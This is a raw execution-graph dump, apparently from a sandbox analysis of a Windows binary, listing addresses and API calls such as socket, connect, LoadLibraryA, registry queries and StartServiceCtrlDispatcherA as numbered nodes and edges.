                                                                    execution_graph 58881 7ffe0ebd184a 58887 7ffe0ebd1855 58881->58887 58882 7ffe0ebd195e 58883 7ffe0ebd196b 58882->58883 58948 7ffe0ebd22d5 10 API calls 58882->58948 58886 7ffe0ebd187d Sleep 58886->58887 58887->58882 58887->58886 58888 7ffe0ebd22d5 10 API calls 58887->58888 58890 7ffe0ebd1932 Sleep 58887->58890 58892 7ffe0ebd191e memcpy 58887->58892 58893 7ffe0ebd256c socket 58887->58893 58928 7ffe0ebd2a1a 58887->58928 58939 7ffe0ebd1780 58887->58939 58888->58887 58890->58887 58892->58887 58894 7ffe0ebd276b WSAGetLastError 58893->58894 58895 7ffe0ebd25a3 58893->58895 58898 7ffe0ebd1292 6 API calls 58894->58898 58896 7ffe0ebd25a7 58895->58896 58897 7ffe0ebd25c5 58895->58897 58949 7ffe0ebd2209 58896->58949 58901 7ffe0ebd2209 8 API calls 58897->58901 58900 7ffe0ebd278f 58898->58900 58903 7ffe0ebd25df 58900->58903 58904 7ffe0ebd2799 58900->58904 58905 7ffe0ebd25c3 58901->58905 58906 7ffe0ebd1292 6 API calls 58903->58906 58966 7ffe0ebd1292 58904->58966 58924 7ffe0ebd25d7 58905->58924 58962 7ffe0ebd233a setsockopt 58905->58962 58910 7ffe0ebd2600 58906->58910 58907 7ffe0ebd261e 58912 7ffe0ebd2623 htonl htons connect 58907->58912 58907->58924 58910->58887 58914 7ffe0ebd267c WSAGetLastError 58912->58914 58915 7ffe0ebd2661 58912->58915 58917 7ffe0ebd268d 58914->58917 58918 7ffe0ebd273e WSAGetLastError 58914->58918 58916 7ffe0ebd2209 8 API calls 58915->58916 58920 7ffe0ebd266e 58916->58920 58921 7ffe0ebd2695 select 58917->58921 58917->58924 58919 7ffe0ebd1292 6 API calls 58918->58919 58919->58924 58920->58900 58920->58924 58922 7ffe0ebd26f6 58921->58922 58923 7ffe0ebd2720 58921->58923 58922->58915 58925 7ffe0ebd26fc WSAGetLastError 58922->58925 58926 7ffe0ebd1292 6 API calls 58923->58926 58977 7ffe0ebd22d5 10 API calls 58924->58977 58927 7ffe0ebd1292 6 API calls 58925->58927 58926->58924 58927->58924 58929 7ffe0ebd2aa8 58928->58929 58930 7ffe0ebd2a34 58928->58930 58931 7ffe0ebd1292 6 API calls 58929->58931 58930->58929 58932 7ffe0ebd2a39 recv 58930->58932 58935 7ffe0ebd2a53 58931->58935 58933 7ffe0ebd2a5c WSAGetLastError 58932->58933 58934 7ffe0ebd2a4f 58932->58934 58933->58935 58936 7ffe0ebd2a70 58933->58936 58934->58935 58938 7ffe0ebd1292 6 API calls 58934->58938 58935->58887 58937 7ffe0ebd1292 6 API calls 58936->58937 58937->58935 58938->58935 58940 7ffe0ebd1842 58939->58940 58941 7ffe0ebd1798 58939->58941 58940->58887 58941->58940 58986 7ffe0ebd9540 58941->58986 58944 7ffe0ebd1834 LeaveCriticalSection 58944->58940 58945 7ffe0ebd17c8 58945->58944 58946 7ffe0ebd1292 6 API calls 58945->58946 58989 7ffe0ebda8a0 58945->58989 58946->58945 58948->58883 58950 7ffe0ebd2219 ioctlsocket 58949->58950 58952 7ffe0ebd224d WSAGetLastError 58950->58952 58954 7ffe0ebd223c 58950->58954 58953 7ffe0ebd1292 6 API calls 58952->58953 58953->58954 58954->58907 58955 7ffe0ebd2154 setsockopt 58954->58955 58956 7ffe0ebd2189 setsockopt 58955->58956 58957 7ffe0ebd21e4 WSAGetLastError 58955->58957 58958 7ffe0ebd21b5 58956->58958 58959 7ffe0ebd21bf WSAGetLastError 58956->58959 58960 7ffe0ebd1292 6 API calls 58957->58960 58958->58905 58961 7ffe0ebd1292 6 API calls 58959->58961 58960->58958 58961->58958 58963 7ffe0ebd2377 58962->58963 58964 7ffe0ebd2381 WSAGetLastError 58962->58964 58963->58907 58965 7ffe0ebd1292 6 API calls 58964->58965 58965->58963 58967 7ffe0ebd12a0 58966->58967 58978 7ffe0ebdd670 58967->58978 58970 7ffe0ebd135c EnterCriticalSection 58973 7ffe0ebd1376 LeaveCriticalSection 58970->58973 58974 7ffe0ebd1393 58970->58974 58971 7ffe0ebd1327 fwrite fflush 58972 7ffe0ebd1350 58971->58972 58972->58910 58973->58971 58975 7ffe0ebd13cd CopyFileA 58974->58975 58976 7ffe0ebd1405 58975->58976 58976->58973 58977->58903 58979 7ffe0ebdd695 58978->58979 58980 7ffe0ebdd67e 58978->58980 58985 7ffe0ebde6ab fputc 58979->58985 58984 7ffe0ebde6ab fputc 58980->58984 58983 7ffe0ebd12f9 58983->58970 58983->58971 58983->58972 58984->58983 58985->58983 58987 7ffe0ebd17ab EnterCriticalSection 58986->58987 58988 7ffe0ebd9556 GetSystemTimeAsFileTime 58986->58988 58987->58945 58988->58987 58990 7ffe0ebda8cc 58989->58990 58991 7ffe0ebda8eb 58989->58991 58992 7ffe0ebda8d6 58990->58992 58993 7ffe0ebda909 58990->58993 58991->58945 58995 7ffe0ebda8d8 58992->58995 58996 7ffe0ebda8f4 58992->58996 59008 7ffe0ebda50f 23 API calls 58993->59008 58997 7ffe0ebda902 58995->58997 58998 7ffe0ebda8df 58995->58998 58996->58991 59003 7ffe0ebda2a2 58996->59003 59007 7ffe0ebda2b0 25 API calls 58997->59007 58998->58991 59006 7ffe0ebda639 45 API calls 58998->59006 59002 7ffe0ebda907 59002->58991 59009 7ffe0ebda060 59003->59009 59006->58991 59007->59002 59008->58991 59038 7ffe0ebd2eab 59009->59038 59016 7ffe0ebda1e9 59023 7ffe0ebda26b 59016->59023 59035 7ffe0ebda087 59016->59035 59086 7ffe0ebd4013 59016->59086 59111 7ffe0ebdafb7 38 API calls 59016->59111 59112 7ffe0ebda9e0 21 API calls 59016->59112 59113 7ffe0ebdab69 66 API calls 59016->59113 59017 7ffe0ebda0f2 strlen 59018 7ffe0ebda109 59017->59018 59019 7ffe0ebda11f strlen 59017->59019 59018->59019 59020 7ffe0ebda10e strlen 59018->59020 59058 7ffe0ebd66c9 59019->59058 59020->59019 59114 7ffe0ebd3ff8 FindClose 59023->59114 59024 7ffe0ebda151 59028 7ffe0ebda159 strlen 59024->59028 59024->59035 59030 7ffe0ebda186 strcpy strlen strlen strlen 59028->59030 59031 7ffe0ebda170 59028->59031 59029 7ffe0ebda277 59034 7ffe0ebd2eab 2 API calls 59029->59034 59029->59035 59030->59016 59031->59030 59032 7ffe0ebda175 strlen 59031->59032 59032->59030 59034->59035 59035->58991 59039 7ffe0ebd2eb6 59038->59039 59040 7ffe0ebd2ec1 QueryPerformanceFrequency QueryPerformanceCounter 59038->59040 59039->59035 59041 7ffe0ebd9cc0 GetModuleHandleExA 59039->59041 59040->59039 59042 7ffe0ebd9ce8 59041->59042 59043 7ffe0ebd9cf2 GetLastError 59041->59043 59045 7ffe0ebd6dd1 59042->59045 59044 7ffe0ebd1292 6 API calls 59043->59044 59044->59042 59046 7ffe0ebd6e18 59045->59046 59047 7ffe0ebd6de2 59045->59047 59048 7ffe0ebd1292 6 API calls 59046->59048 59049 7ffe0ebd6de7 59047->59049 59050 7ffe0ebd6e48 59047->59050 59051 7ffe0ebd6dfd 59048->59051 59053 7ffe0ebd6e78 59049->59053 59054 7ffe0ebd6df0 59049->59054 59052 7ffe0ebd1292 6 API calls 59050->59052 59051->59016 59051->59017 59052->59051 59055 7ffe0ebd1292 6 API calls 59053->59055 59115 7ffe0ebd6c92 8 API calls 59054->59115 59055->59051 59057 7ffe0ebd6df5 59057->59051 59059 7ffe0ebd66e7 59058->59059 59060 7ffe0ebd66d2 GetFileAttributesA 59058->59060 59062 7ffe0ebd1292 6 API calls 59059->59062 59061 7ffe0ebd6717 GetLastError 59060->59061 59063 7ffe0ebd66dd 59060->59063 59061->59063 59062->59063 59063->59024 59064 7ffe0ebd42be 59063->59064 59065 7ffe0ebd42dd strlen 59064->59065 59066 7ffe0ebd4318 59064->59066 59068 7ffe0ebd42ee 59065->59068 59083 7ffe0ebd4309 59065->59083 59067 7ffe0ebd1292 6 API calls 59066->59067 59067->59083 59069 7ffe0ebd4396 strcpy strlen 59068->59069 59070 7ffe0ebd42f7 CreateDirectoryA 59068->59070 59071 7ffe0ebd43ce strlen 59069->59071 59080 7ffe0ebd4375 59069->59080 59072 7ffe0ebd4350 GetLastError 59070->59072 59070->59083 59071->59080 59073 7ffe0ebd1292 6 API calls 59072->59073 59073->59080 59074 7ffe0ebd4509 59079 7ffe0ebd1292 6 API calls 59074->59079 59075 7ffe0ebd4580 59077 7ffe0ebd1292 6 API calls 59075->59077 59076 7ffe0ebd43bd strlen 59076->59071 59078 7ffe0ebd4532 59077->59078 59078->59024 59079->59078 59080->59069 59080->59071 59080->59076 59081 7ffe0ebd443a CreateDirectoryA 59080->59081 59080->59083 59082 7ffe0ebd4451 GetLastError 59081->59082 59084 7ffe0ebd43e5 59081->59084 59082->59084 59083->59074 59083->59075 59084->59080 59085 7ffe0ebd1292 6 API calls 59084->59085 59085->59084 59087 7ffe0ebd4033 59086->59087 59106 7ffe0ebd4079 59086->59106 59089 7ffe0ebd403c 59087->59089 59090 7ffe0ebd40d2 59087->59090 59088 7ffe0ebd1292 6 API calls 59110 7ffe0ebd40c3 59088->59110 59092 7ffe0ebd410a 59089->59092 59093 7ffe0ebd4045 59089->59093 59091 7ffe0ebd1292 6 API calls 59090->59091 59091->59110 59094 7ffe0ebd1292 6 API calls 59092->59094 59095 7ffe0ebd4142 FindFirstFileA 59093->59095 59096 7ffe0ebd4051 FindNextFileA 59093->59096 59094->59110 59097 7ffe0ebd4156 59095->59097 59098 7ffe0ebd4163 GetLastError 59095->59098 59099 7ffe0ebd4067 59096->59099 59100 7ffe0ebd4192 GetLastError 59096->59100 59103 7ffe0ebd406c strcpy 59097->59103 59102 7ffe0ebd4170 59098->59102 59104 7ffe0ebd4177 59098->59104 59099->59103 59101 7ffe0ebd41bb 59100->59101 59100->59102 59107 7ffe0ebd1292 6 API calls 59101->59107 59105 7ffe0ebd41ad FindClose 59102->59105 59102->59106 59109 7ffe0ebd41d8 59102->59109 59103->59106 59108 7ffe0ebd1292 6 API calls 59104->59108 59105->59106 59106->59088 59106->59110 59107->59102 59108->59102 59109->59016 59110->59016 59111->59016 59112->59016 59113->59016 59114->59029 59115->59057 59116 7ffe11503afd 59121 7ffe11503b0a 59116->59121 59117 7ffe11503d1a 59118 7ffe11503b2b Sleep 59118->59121 59120 7ffe11503ba7 Sleep 59120->59121 59121->59117 59121->59118 59121->59120 59122 7ffe11501292 6 API calls 59121->59122 59124 7ffe11503a94 8 API calls 59121->59124 59125 7ffe11509c52 13 API calls 59121->59125 59122->59121 59124->59121 59125->59121 59126 7ff6bfd612fd 59129 7ff6bfd61131 59126->59129 59130 7ff6bfd6115a 59129->59130 59131 7ff6bfd61172 59130->59131 59132 7ff6bfd61169 Sleep 59130->59132 59133 7ff6bfd61188 _amsg_exit 59131->59133 59134 7ff6bfd61194 59131->59134 59132->59130 59135 7ff6bfd611b5 59133->59135 59134->59135 59136 7ff6bfd6119a _initterm 59134->59136 59137 7ff6bfd611c5 _initterm 59135->59137 59138 7ff6bfd611de 59135->59138 59136->59135 59137->59138 59150 7ff6bfd6a27a 59138->59150 59141 7ff6bfd6122e 59142 7ff6bfd61233 malloc 59141->59142 59143 7ff6bfd61253 59142->59143 59144 7ff6bfd61258 strlen malloc 59143->59144 59145 7ff6bfd61283 59143->59145 59144->59143 59163 7ff6bfd68e30 59145->59163 59147 7ff6bfd612c4 59148 7ff6bfd612e8 59147->59148 59149 7ff6bfd612e3 _cexit 59147->59149 59149->59148 59151 7ff6bfd61208 SetUnhandledExceptionFilter 59150->59151 59153 7ff6bfd6a298 59150->59153 59151->59141 59152 7ff6bfd6a494 59152->59151 59155 7ff6bfd6a4bc VirtualProtect 59152->59155 59153->59152 59154 7ff6bfd6a315 59153->59154 59159 7ff6bfd6a34a 59153->59159 59154->59152 59156 7ff6bfd6a329 59154->59156 59155->59152 59156->59154 59167 7ff6bfd6a134 6 API calls 59156->59167 59159->59152 59160 7ff6bfd6a36d 59159->59160 59168 7ff6bfd6a134 6 API calls 59160->59168 59169 7ff6bfd6a0d0 VirtualQuery VirtualProtect GetLastError 59160->59169 59170 7ff6bfd6a0d0 VirtualQuery VirtualProtect GetLastError 59160->59170 59164 7ff6bfd68e40 59163->59164 59171 7ff6bfd68c4a 59164->59171 59167->59156 59168->59159 59169->59159 59170->59159 59172 7ff6bfd68c54 strcmp 59171->59172 59174 7ff6bfd68c6b strcmp 59172->59174 59175 7ff6bfd68cce 59172->59175 59176 7ff6bfd68e08 59174->59176 59177 7ff6bfd68c82 StartServiceCtrlDispatcherA 59174->59177 59192 7ff6bfd6849a 59175->59192 59179 7ff6bfd699e2 6 API calls 59176->59179 59180 7ff6bfd68d26 GetLastError 59177->59180 59189 7ff6bfd68cbb 59177->59189 59179->59189 59258 7ff6bfd699e2 59180->59258 59183 7ff6bfd68cd9 59211 7ff6bfd688ee 10 API calls 59183->59211 59186 7ff6bfd68cde 59212 7ff6bfd689aa 13 API calls 59186->59212 59188 7ff6bfd68cf7 _read 59188->59183 59190 7ff6bfd68ced 59188->59190 59189->59147 59190->59183 59190->59188 59249 7ff6bfd6886d 59190->59249 59269 7ff6bfd61360 GetModuleHandleExA 59192->59269 59197 7ff6bfd684cc 59210 7ff6bfd684d0 59197->59210 59331 7ff6bfd693f0 59197->59331 59205 7ff6bfd61360 8 API calls 59206 7ff6bfd68530 59205->59206 59207 7ff6bfd64bc4 12 API calls 59206->59207 59208 7ff6bfd68549 59207->59208 59208->59210 59383 7ff6bfd66242 59208->59383 59210->59183 59213 7ff6bfd68563 59210->59213 59211->59186 59212->59189 59214 7ff6bfd61360 8 API calls 59213->59214 59215 7ff6bfd685ae 59214->59215 59216 7ff6bfd64ab1 8 API calls 59215->59216 59217 7ff6bfd685c3 59216->59217 59218 7ff6bfd685cd strlen 59217->59218 59230 7ff6bfd687cd 59217->59230 59220 7ff6bfd685ea 59218->59220 59221 7ff6bfd68603 _mbscpy strlen strlen 59218->59221 59219 7ff6bfd68805 59219->59190 59220->59221 59222 7ff6bfd685ef strlen 59220->59222 59232 7ff6bfd6864a 59221->59232 59222->59221 59223 7ff6bfd687c3 59789 7ff6bfd61cd8 FindClose 59223->59789 59224 7ff6bfd61cf3 12 API calls 59224->59232 59226 7ff6bfd687e4 59227 7ff6bfd699e2 6 API calls 59226->59227 59227->59219 59228 7ff6bfd61694 8 API calls 59228->59232 59229 7ff6bfd699e2 6 API calls 59229->59230 59230->59219 59230->59226 59230->59229 59701 7ffe11504510 59230->59701 59719 7ffe0ec034b0 59230->59719 59732 7ffe0ebda930 59230->59732 59745 7ffe1330a6e0 59230->59745 59756 7ffe0e16bdc0 59230->59756 59771 7ffe0eb48440 59230->59771 59790 7ff6bfd681e0 SetServiceStatus 59230->59790 59232->59223 59232->59224 59232->59228 59233 7ff6bfd68715 59232->59233 59235 7ff6bfd6866e FreeLibrary 59232->59235 59237 7ff6bfd61613 8 API calls 59232->59237 59788 7ff6bfd681e0 SetServiceStatus 59232->59788 59234 7ff6bfd699e2 6 API calls 59233->59234 59236 7ff6bfd6872d GetProcessHeap HeapAlloc 59234->59236 59235->59232 59239 7ff6bfd68776 59236->59239 59240 7ff6bfd6874f _mbscpy 59236->59240 59237->59232 59242 7ff6bfd699e2 6 API calls 59239->59242 59240->59239 59241 7ff6bfd6879b 59240->59241 59241->59223 59241->59241 59242->59241 59250 7ff6bfd61360 8 API calls 59249->59250 59251 7ff6bfd6889c 59250->59251 59252 7ff6bfd64ab1 8 API calls 59251->59252 59253 7ff6bfd688ae 59252->59253 59254 7ff6bfd6824d 20 API calls 59253->59254 59257 7ff6bfd688b4 59253->59257 59255 7ff6bfd688ca 59254->59255 59256 7ff6bfd688d7 SleepEx 59255->59256 59255->59257 59256->59257 59257->59190 59259 7ff6bfd699f0 59258->59259 61252 7ff6bfd6ab10 59259->61252 59262 7ff6bfd69aac EnterCriticalSection 59265 7ff6bfd69ac6 LeaveCriticalSection 59262->59265 59266 7ff6bfd69ae3 59262->59266 59263 7ff6bfd69a77 fwrite fflush 59264 7ff6bfd69aa0 59263->59264 59264->59189 59265->59263 59267 7ff6bfd69b1d CopyFileA 59266->59267 59268 7ff6bfd69b55 59267->59268 59268->59265 59270 7ff6bfd61388 59269->59270 59271 7ff6bfd61392 GetLastError 59269->59271 59273 7ff6bfd64bc4 59270->59273 59272 7ff6bfd699e2 6 API calls 59271->59272 59272->59270 59274 7ff6bfd64c0a 59273->59274 59275 7ff6bfd64bda 59273->59275 59276 7ff6bfd699e2 6 API calls 59274->59276 59406 7ff6bfd64ab1 59275->59406 59282 7ff6bfd64beb 59276->59282 59279 7ff6bfd64c3a strlen 59280 7ff6bfd64c4c 59279->59280 59281 7ff6bfd64c62 _mbscat strlen 59279->59281 59280->59281 59283 7ff6bfd64c51 strlen 59280->59283 59281->59282 59282->59197 59284 7ff6bfd63d81 59282->59284 59283->59281 59285 7ff6bfd63d98 59284->59285 59286 7ff6bfd63e84 59284->59286 59287 7ff6bfd63eb4 59285->59287 59288 7ff6bfd63da1 CreateFileA 59285->59288 59289 7ff6bfd699e2 6 API calls 59286->59289 59293 7ff6bfd699e2 6 API calls 59287->59293 59290 7ff6bfd63dec LockFileEx 59288->59290 59291 7ff6bfd63ee7 GetLastError 59288->59291 59292 7ff6bfd63e39 59289->59292 59295 7ff6bfd63fcc GetLastError 59290->59295 59296 7ff6bfd63e20 59290->59296 59294 7ff6bfd699e2 6 API calls 59291->59294 59299 7ff6bfd6414b 59292->59299 59300 7ff6bfd63e63 59292->59300 59293->59292 59304 7ff6bfd63f08 59294->59304 59298 7ff6bfd699e2 6 API calls 59295->59298 59296->59292 59297 7ff6bfd6413d CloseHandle 59296->59297 59297->59299 59305 7ff6bfd63fed 59298->59305 59301 7ff6bfd699e2 6 API calls 59299->59301 59302 7ff6bfd699e2 6 API calls 59300->59302 59303 7ff6bfd63e79 59301->59303 59302->59303 59303->59210 59307 7ff6bfd69b8c InitializeCriticalSectionAndSpinCount 59303->59307 59304->59295 59306 7ff6bfd6403e 59304->59306 59305->59306 59306->59297 59306->59305 59308 7ff6bfd69cdd GetLastError 59307->59308 59309 7ff6bfd69bba 59307->59309 59310 7ff6bfd699e2 6 API calls 59308->59310 59311 7ff6bfd61360 8 API calls 59309->59311 59320 7ff6bfd69cb6 59310->59320 59312 7ff6bfd69bd6 59311->59312 59313 7ff6bfd64ab1 8 API calls 59312->59313 59314 7ff6bfd69bea 59313->59314 59315 7ff6bfd69bf4 strlen 59314->59315 59314->59320 59316 7ff6bfd69c0d 59315->59316 59317 7ff6bfd69c23 59315->59317 59316->59317 59319 7ff6bfd69c12 strlen 59316->59319 59321 7ff6bfd69c48 strlen fopen 59317->59321 59322 7ff6bfd69c28 _mbscat strlen 59317->59322 59318 7ff6bfd699e2 6 API calls 59323 7ff6bfd69cd3 59318->59323 59319->59317 59320->59318 59324 7ff6bfd69daa 59321->59324 59325 7ff6bfd69c94 59321->59325 59322->59321 59323->59197 59326 7ff6bfd699e2 6 API calls 59324->59326 59327 7ff6bfd699e2 6 API calls 59325->59327 59326->59320 59328 7ff6bfd69cae 59327->59328 59328->59320 59329 7ff6bfd69e1a 59328->59329 59330 7ff6bfd699e2 6 API calls 59329->59330 59330->59323 59420 7ff6bfd61694 59331->59420 59335 7ff6bfd69457 FreeLibrary 59338 7ff6bfd694b7 GetNativeSystemInfo GetWindowsDirectoryA 59335->59338 59345 7ff6bfd6948d 59335->59345 59337 7ff6bfd699e2 6 API calls 59361 7ff6bfd684fe 59337->59361 59339 7ff6bfd694f6 GetLastError 59338->59339 59340 7ff6bfd695ce 59338->59340 59342 7ff6bfd699e2 6 API calls 59339->59342 59343 7ff6bfd699e2 6 API calls 59340->59343 59342->59345 59346 7ff6bfd695ef 59343->59346 59344 7ff6bfd699e2 6 API calls 59344->59335 59345->59337 59346->59345 59436 7ff6bfd65602 59346->59436 59348 7ff6bfd6962b 59348->59345 59349 7ff6bfd6963b GetVolumeInformationA 59348->59349 59350 7ff6bfd699e2 6 API calls 59348->59350 59350->59348 59361->59210 59366 7ff6bfd6836f 59361->59366 59367 7ff6bfd61360 8 API calls 59366->59367 59368 7ff6bfd683b4 59367->59368 59369 7ff6bfd64ab1 8 API calls 59368->59369 59370 7ff6bfd683c6 59369->59370 59371 7ff6bfd683cc _mbscpy 59370->59371 59372 7ff6bfd683f6 59370->59372 59463 7ff6bfd6824d strlen 59371->59463 59374 7ff6bfd699e2 6 API calls 59372->59374 59375 7ff6bfd68421 59374->59375 59375->59205 59375->59210 59377 7ff6bfd683f2 59377->59372 59379 7ff6bfd68471 59377->59379 59384 7ff6bfd6626a 59383->59384 59385 7ff6bfd662f5 59383->59385 59387 7ff6bfd62515 30 API calls 59384->59387 59386 7ff6bfd699e2 6 API calls 59385->59386 59407 7ff6bfd64af8 59406->59407 59408 7ff6bfd64ac2 59406->59408 59409 7ff6bfd699e2 6 API calls 59407->59409 59410 7ff6bfd64ac7 59408->59410 59411 7ff6bfd64b28 59408->59411 59417 7ff6bfd64add 59409->59417 59413 7ff6bfd64b58 59410->59413 59414 7ff6bfd64ad0 59410->59414 59412 7ff6bfd699e2 6 API calls 59411->59412 59412->59417 59415 7ff6bfd699e2 6 API calls 59413->59415 59419 7ff6bfd64972 8 API calls 59414->59419 59415->59417 59417->59279 59417->59282 59418 7ff6bfd64ad5 59418->59417 59419->59418 59421 7ff6bfd616cb 59420->59421 59422 7ff6bfd616a2 LoadLibraryA 59420->59422 59423 7ff6bfd616ce GetLastError 59421->59423 59422->59423 59424 7ff6bfd616b0 59422->59424 59426 7ff6bfd699e2 6 API calls 59423->59426 59425 7ff6bfd699e2 6 API calls 59424->59425 59427 7ff6bfd616c9 59425->59427 59426->59427 59427->59345 59428 7ff6bfd61613 59427->59428 59429 7ff6bfd61661 59428->59429 59430 7ff6bfd61630 GetProcAddress 59428->59430 59431 7ff6bfd61666 GetLastError 59429->59431 59430->59431 59432 7ff6bfd61641 59430->59432 59434 7ff6bfd699e2 6 API calls 59431->59434 59433 7ff6bfd699e2 6 API calls 59432->59433 59435 7ff6bfd6165f 59433->59435 59434->59435 59435->59335 59435->59344 59437 7ff6bfd6562b 59436->59437 59455 7ff6bfd6568a 59436->59455 59439 7ff6bfd656ed 59437->59439 59440 7ff6bfd65634 59437->59440 59438 7ff6bfd699e2 6 API calls 59456 7ff6bfd656e3 59438->59456 59441 7ff6bfd699e2 6 API calls 59439->59441 59442 7ff6bfd6563d 59440->59442 59443 7ff6bfd65720 59440->59443 59441->59456 59445 7ff6bfd65646 RegOpenKeyExA 59442->59445 59446 7ff6bfd65753 59442->59446 59444 7ff6bfd699e2 6 API calls 59443->59444 59444->59456 59447 7ff6bfd6566d 59445->59447 59448 7ff6bfd65786 RegQueryValueExA 59445->59448 59449 7ff6bfd699e2 6 API calls 59446->59449 59451 7ff6bfd699e2 6 API calls 59447->59451 59461 7ff6bfd657b4 59448->59461 59462 7ff6bfd65807 RegCloseKey 59448->59462 59449->59456 59450 7ff6bfd65a89 59454 7ff6bfd699e2 6 API calls 59450->59454 59451->59455 59452 7ff6bfd65aac 59458 7ff6bfd65929 59454->59458 59455->59438 59455->59456 59456->59450 59457 7ff6bfd658e6 59456->59457 59457->59452 59459 7ff6bfd699e2 6 API calls 59457->59459 59458->59348 59459->59458 59460 7ff6bfd699e2 6 API calls 59460->59461 59461->59460 59461->59462 59462->59456 59464 7ff6bfd6827d strlen 59463->59464 59465 7ff6bfd68267 59463->59465 59516 7ff6bfd643a9 59464->59516 59465->59464 59466 7ff6bfd6826c strlen 59465->59466 59466->59464 59468 7ff6bfd682a5 59470 7ff6bfd68307 strlen 59468->59470 59472 7ff6bfd68348 59468->59472 59474 7ff6bfd68334 strlen 59468->59474 59475 7ff6bfd682b6 59468->59475 59522 7ff6bfd61cf3 59468->59522 59471 7ff6bfd643a9 8 API calls 59470->59471 59471->59468 59546 7ff6bfd61cd8 FindClose 59472->59546 59474->59468 59475->59377 59476 7ff6bfd679c0 59475->59476 59477 7ff6bfd67a62 59476->59477 59478 7ff6bfd679e2 59476->59478 59517 7ff6bfd643c7 59516->59517 59518 7ff6bfd643b2 GetFileAttributesA 59516->59518 59520 7ff6bfd699e2 6 API calls 59517->59520 59519 7ff6bfd643f7 GetLastError 59518->59519 59521 7ff6bfd643bd 59518->59521 59519->59521 59520->59521 59521->59468 59523 7ff6bfd61d59 59522->59523 59524 7ff6bfd61d13 59522->59524 59525 7ff6bfd699e2 6 API calls 59523->59525 59543 7ff6bfd61da3 59523->59543 59526 7ff6bfd61d1c 59524->59526 59527 7ff6bfd61db2 59524->59527 59525->59543 59529 7ff6bfd61dea 59526->59529 59530 7ff6bfd61d25 59526->59530 59528 7ff6bfd699e2 6 API calls 59527->59528 59528->59543 59543->59468 59546->59475 59791 7ffe1150143c InitializeCriticalSectionAndSpinCount 59701->59791 59704 7ffe1150452d 59707 7ffe11501292 6 API calls 59704->59707 59708 7ffe1150454a 59707->59708 59708->59230 59711 7ffe11504529 59711->59704 59858 7ffe115024ae WSAStartup 59711->59858 59712 7ffe1150459b 59712->59704 59866 7ffe11509fe1 InitializeCriticalSectionAndSpinCount 59712->59866 60123 7ffe0ec0317c InitializeCriticalSectionAndSpinCount 59719->60123 59726 7ffe0ec034c6 59731 7ffe0ec034ca 59726->59731 60192 7ffe0ec02f1e WSAStartup 59726->60192 59727 7ffe0ec03511 59727->59731 60200 7ffe0ec03b21 InitializeCriticalSectionAndSpinCount 59727->60200 59731->59230 60350 7ffe0ebd143c InitializeCriticalSectionAndSpinCount 59732->60350 59735 7ffe0ebda946 59744 7ffe0ebda94a 59735->59744 60419 7ffe0ebd2dde WSAStartup 59735->60419 59744->59230 60540 7ffe1330a3ac InitializeCriticalSectionAndSpinCount 59745->60540 59748 7ffe1330a6f6 59750 7ffe1330a6fa 59748->59750 60609 7ffe13301fce WSAStartup 59748->60609 59750->59230 59754 7ffe1330a741 59754->59750 60617 7ffe13306941 InitializeCriticalSectionAndSpinCount 59754->60617 60770 7ffe0e16143c InitializeCriticalSectionAndSpinCount 59756->60770 59759 7ffe0e16bdd6 59760 7ffe0e16bdda 59759->59760 60839 7ffe0e162dde WSAStartup 59759->60839 59760->59230 61005 7ffe0eb4143c InitializeCriticalSectionAndSpinCount 59771->61005 59774 7ffe0eb48456 59775 7ffe0eb4845a 59774->59775 61074 7ffe0eb449bf InitializeCriticalSectionAndSpinCount 59774->61074 59775->59230 59788->59232 59789->59230 59790->59230 59792 7ffe1150146a 59791->59792 59793 7ffe11501590 GetLastError 59791->59793 59918 7ffe11504170 GetModuleHandleExA 59792->59918 59795 7ffe11501292 6 API calls 59793->59795 59802 7ffe11501569 59795->59802 59799 7ffe115014a4 strlen 59800 7ffe115014bd 59799->59800 59801 7ffe115014d3 59799->59801 59800->59801 59804 7ffe115014c2 strlen 59800->59804 59805 7ffe115014f8 strlen fopen 59801->59805 59806 7ffe115014d8 strcat strlen 59801->59806 59803 7ffe11501292 6 API calls 59802->59803 59814 7ffe11501586 59803->59814 59804->59801 59807 7ffe1150165d 59805->59807 59808 7ffe11501547 59805->59808 59806->59805 59809 7ffe11501292 6 API calls 59807->59809 59810 7ffe11501292 6 API calls 59808->59810 59809->59802 59811 7ffe11501561 59810->59811 59811->59802 59812 7ffe115016cd 59811->59812 59813 7ffe11501292 6 API calls 59812->59813 59813->59814 59814->59711 59815 7ffe1150ca74 59814->59815 59816 7ffe1150ca96 59815->59816 59817 7ffe1150cad9 59815->59817 59936 7ffe1150c6e0 59816->59936 59819 7ffe11501292 6 API calls 59817->59819 59823 7ffe11504587 59819->59823 59821 7ffe1150cb09 _errno _strtoui64 _errno 59822 7ffe1150cb3c _errno 59821->59822 59821->59823 59824 7ffe11501292 6 API calls 59822->59824 59823->59704 59825 7ffe11504bc0 59823->59825 59824->59823 59978 7ffe115044a4 59825->59978 59859 7ffe115024ca 59858->59859 59860 7ffe115024f2 59858->59860 59862 7ffe11501292 6 API calls 59859->59862 59861 7ffe11501292 6 API calls 59860->59861 59864 7ffe1150250b 59861->59864 59863 7ffe115024e4 59862->59863 59863->59712 59865 7ffe11501292 6 API calls 59864->59865 59865->59863 59867 7ffe1150a084 GetLastError 59866->59867 59868 7ffe1150a006 CreateThread 59866->59868 59871 7ffe11501292 6 API calls 59867->59871 59869 7ffe1150a052 59868->59869 59870 7ffe1150a15c GetLastError 59868->59870 59872 7ffe1150a255 59869->59872 59877 7ffe1150a05f 59869->59877 59873 7ffe11501292 6 API calls 59870->59873 59871->59877 59873->59877 59919 7ffe11501486 59918->59919 59920 7ffe115041a2 GetLastError 59918->59920 59922 7ffe11508571 59919->59922 59921 7ffe11501292 6 API calls 59920->59921 59921->59919 59923 7ffe11508582 59922->59923 59924 7ffe115085b8 59922->59924 59926 7ffe11508587 59923->59926 59927 7ffe115085e8 59923->59927 59925 7ffe11501292 6 API calls 59924->59925 59930 7ffe1150149a 59925->59930 59928 7ffe11508590 59926->59928 59929 7ffe11508618 59926->59929 59931 7ffe11501292 6 API calls 59927->59931 59935 7ffe11508432 8 API calls 59928->59935 59933 7ffe11501292 6 API calls 59929->59933 59930->59799 59930->59802 59931->59930 59933->59930 59934 7ffe11508595 59934->59930 59935->59934 59937 7ffe1150c6f1 59936->59937 59938 7ffe1150c729 59936->59938 59944 7ffe1150c3c9 59937->59944 59939 7ffe11501292 6 API calls 59938->59939 59942 7ffe1150c708 59939->59942 59942->59821 59942->59823 59945 7ffe1150c3e1 59944->59945 59946 7ffe1150c3fc 59944->59946 59947 7ffe1150c42f 59945->59947 59948 7ffe1150c3e6 59945->59948 59949 7ffe11501292 6 API calls 59946->59949 59952 7ffe11501292 6 API calls 59947->59952 